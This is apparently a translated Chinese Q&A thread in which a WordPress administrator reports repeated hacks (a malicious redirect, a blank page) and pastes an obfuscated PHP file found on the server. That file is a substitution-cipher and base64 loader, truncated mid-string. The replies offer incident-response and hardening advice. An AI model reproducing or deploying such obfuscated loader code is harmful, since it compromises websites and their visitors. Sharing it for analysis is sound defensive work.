我负责Wordpress网站。一年前,该网站曾被黑客入侵。当有人通过输入url连接到该网站时,他会被重定向到另一个"假"网站。我发现index.php中有一行是用来重定向到另一个站点的。我删除了线路并恢复了我的ftp服务器。在此之前,我注意到ftp服务器上有一些可疑文件,我没有创建这些文件,并且有一些模糊的php和js代码,带有一些随机的字符。
最近的网站有同样的问题,除非只有一个空白页,当我们连接到该网站。我重新修复了网站。在此之前,我注意到ftp服务器上有一些可疑的文件,我没有创建这些文件,其中有一些模糊的php和js代码,其中有一些随机的字符。
所有的文件都有几乎相同的创建日期,我没有权利从服务器上删除它们。我认为漏洞来自这里,但我在互联网上找不到任何类似的案例。有人知道这方面的信息吗?我只是在找一些信息,我现在无法访问这个网站。
编辑:我有这样的文件:
<?php
$vHMX55W = Array('1'=>'C', '0'=>'j', '3'=>'U', '2'=>'x', '5'=>'F', '4'=>'s', '7'=>'q', '6'=>'P', '9'=>'T', '8'=>'y', 'A'=>'5', 'C'=>'e', 'B'=>'G', 'E'=>'f', 'D'=>'a', 'G'=>'1', 'F'=>'2', 'I'=>'7', 'H'=>'m', 'K'=>'X', 'J'=>'n', 'M'=>'c', 'L'=>'E', 'O'=>'v', 'N'=>'M', 'Q'=>'i', 'P'=>'Q', 'S'=>'g', 'R'=>'O', 'U'=>'A', 'T'=>'I', 'W'=>'h', 'V'=>'N', 'Y'=>'S', 'X'=>'t', 'Z'=>'6', 'a'=>'3', 'c'=>'Z', 'b'=>'w', 'e'=>'R', 'd'=>'k', 'g'=>'9', 'f'=>'z', 'i'=>'J', 'h'=>'4', 'k'=>'V', 'j'=>'D', 'm'=>'0', 'l'=>'d', 'o'=>'u', 'n'=>'W', 'q'=>'8', 'p'=>'b', 's'=>'l', 'r'=>'Y', 'u'=>'K', 't'=>'H', 'w'=>'r', 'v'=>'L', 'y'=>'p', 'x'=>'o', 'z'=>'B');
function v9PSABL($vMCS1QU, $vDG7FSU){$v4ZU9QC = ''; for($i=0; $i < strlen($vMCS1QU); $i++){$v4ZU9QC .= isset($vDG7FSU[$vMCS1QU[$i]]) ? $vDG7FSU[$vMCS1QU[$i]] : $vMCS1QU[$i];}
return base64_decode($v4ZU9QC);}
$vW073GA = 'DnrxDKVfcKPxi5g9ekinekTyuPyI1SddKGV53sc53s4J3LWPKGV59Lr'.
'JKYUgT1TOT04S1SddKGV53sc53s4J3dkV9Ge5Km5Le5TJKYUgT1T2N0MoN1hbv0LQRbxiDn'.
'rxTnkXMteAu1eE3mkYkdkYn8lTk5ePKGWEedgYkm5YeLkLKmc63QlluYdu1K4u1PddKGV53sc53s4JY5'.
'e335grKmc63slz3de5e5gB9GTJKYUgT1T2N0MoN1hbv0LQRbxiEPyg1SyycQWyMaVsl1SdKmci9Lk9uYduCbxicHg8cn50D1S'.
'dKmci9Lk9TB5fT1ewcKdS69hSiBcypB3y1SsI1SdiDnrxTKVmMJzOM8SdcHs4ck4JpH5XcYllv1UQvHybc8TyuPxi1K4u1PdiiBc'.
'ypBkornGsTjmSrn2mcKiEpn50MHgfu1eHDn2sn8lornGsiGmyRbxi1PddcHs4cnAWpn3S6YzolnGEpn50MHgfu1eHDn2spH5XcYd'.
'I1Sdi1YeHDn2spH5XcYUgTtWolnGEpn50MHgfu1eHDn2spH5XcYdI1Sdi1YeEedsNekVp'.
'iBXsCkGpTHAWpn3QKYUgT1eHDn2spH5Xc94u1Psg1Ssg1Jmu1PyHlnA0lBsOpQz0lKVmp'.
'FGEMae8DKzElB5JM8SdlBkhl1duCbxST1USitesCtPS6YzfltiyM5gmrnlfu1'.
'emcKWmv1UJ6BL+i8dI1SxST1USitesCtPS6YzfltiEMHkbpB50cYSQ6BLSDtisc0GMTQT4T1ipT1T4T1emcKWmu94uT1UST1e'.
'mcKWmTjmSMae8KaisMB2WrF3xT0bOr9hQv1UQTQbSitesCtPyRbxST1USitesCtPS6Yzflti'.
'EMHkbpB50cYSQK1T+TQbSTQzlT1T4T1emcKWmu94u1QUST1z8cKeGMHhSi'.
'tesCtPI1Jmu1HcGpHVmDngoTBsfKFsbu1efltTyTt4uT1z8cKeGMHhSMtiscGgXrKe0D1S'.
'QvGhxnfLXRkGqnfLXRkGpN1mAKKb2nfUXRkGpN1mAKKb8nfUXV5GpN1'.
'mAKKb8Vk4bv9kluYWMvQWpN1mAKK2pNYmAKk4bv9slEj5pN1mAKk4bv9slEjipN1mmKk4bv9slEjTGnf'.
'UXVkmyuK4fEYPOTQbdMae8u94uEPxucJkoraeypFhScJiOpkgxpaVmu1e0pFAmcnAmuPyI1SxST1USi'.
'BWOMaPS6YzbMHkJKaisMB2WrF3xi8gCutlala2HltUyK1hODYM4i8'.
'M4P1eE3mkYkdkYn8lTk5ePKmW63GPJKYdI1SxST1USDnrSuBsfKFsbu1expaVmuYduT1UST'.
't4uT1UST1UST1z8cKeGMHhSiBVOpJespJPI1QUST1zg1QUST1UuT1UST1empFXspJNS6YzsCtz4pFesu1iUTQbSiBVOpJespJPy'.
'RbxuT1UST1e0pFAmcnAmTjmSiteODFkoMG4bKYUoT1iUTQUoT1exp'.
'aVmT1hST0hQRbxuT1USTtisltk8pQUdrFgolBkolj4uEPxucJkoraeypFhSrn2mcKiEpn50MHgfu1e0pFAmcn'.
'AmuPyI1QUST1zbMHkJKFGWlBVxKF54p1SJTa4xvQxyEYVkDYM4T1e0pFAmcnAmv1Udpn5mr'.
'FWsM8dI1SxST1UScHg8u1eyTjmSNj4SiBdS61z0pakol1Sdpn5mrFWsMG'.
'42KYdIT1eyu84y1QUST1zI1SxST1UST1UST1eoM8UgTBkhMB2OcB3xTJbQv1Udpn5mrF'.
'WsMG42Kk4dDkmyRbxST1UST1UST1e0NQUgTBVOlnAmu1eoM8dI'.
'1QUST1UST1USitiWpHPS6Yz8rnAdujU4T1SdrfTSvYU2uYdI1QUST1UST1USiBVOpJespJPS6Yz'.
'fltiEMHkbpB50cYSQC8ToiBGWlBVxcKVpNkGpiBslvQigTQbSiBAfn8'.
有人知道这是什么吗?
这是令人难以置信的广泛。网站上有数百万种可能的攻击媒介。你遭到袭击这一事实本身并不意味着上述任何一种可能性高于其他任何一种。
由于您有攻击发生的时间戳,因此请检查当时的服务器日志以查找有关向量的线索。当时有SFTP访问吗?可能是合法用户的密码被泄露了。那时候有HTTP访问吗?可能某个插件存在漏洞,需要禁用或升级。
攻击者只需要一个漏洞就可以访问站点。它可能是显而易见的(例如,如果你从一个已知的用户帐户看到SFTP活动),或者它可能需要广泛的研究来弄清楚发生了什么以及如何。
很简单:你被黑了。
忘记去混淆php文件;他们可能会告诉你这些文件是做什么的,但是他们不会告诉你这些文件是如何到达那里的。全部删除
除非你仔细分析服务器日志并检查所有插件和主题的漏洞,否则你不会找到利用向量。矢量可能是你自己的PC/mac上窃取凭证的恶意软件。
修复很简单:仔细清理网站和托管帐户下面的常见问题解答我的网站被黑客攻击- WordPress Codex。扫描您自己的PC/Mac和任何用于访问WordPress admin和托管帐户的机器。
如果这是你自己的服务器,你也需要加固它。试着搜索https://serverfault.com/以获取有关操作系统的信息以及如何保护和加固它。
看看加固WordPress - WordPress Codex和暴力破解攻击- WordPress Codex
当你说你没有权利删除它们时,你不是在管理网站吗?如果您没有完全的管理权限,您应该联系拥有管理权限的人员并解释情况,以便他们可以立即处理,或者至少允许您这样做。
你知道这个网站第一次和第二次是怎么被黑的吗?显然,这里有一个需要解决的漏洞。
留下了什么样的文件?除了发现"晦涩"的代码,你还能进一步检查/解释内容吗?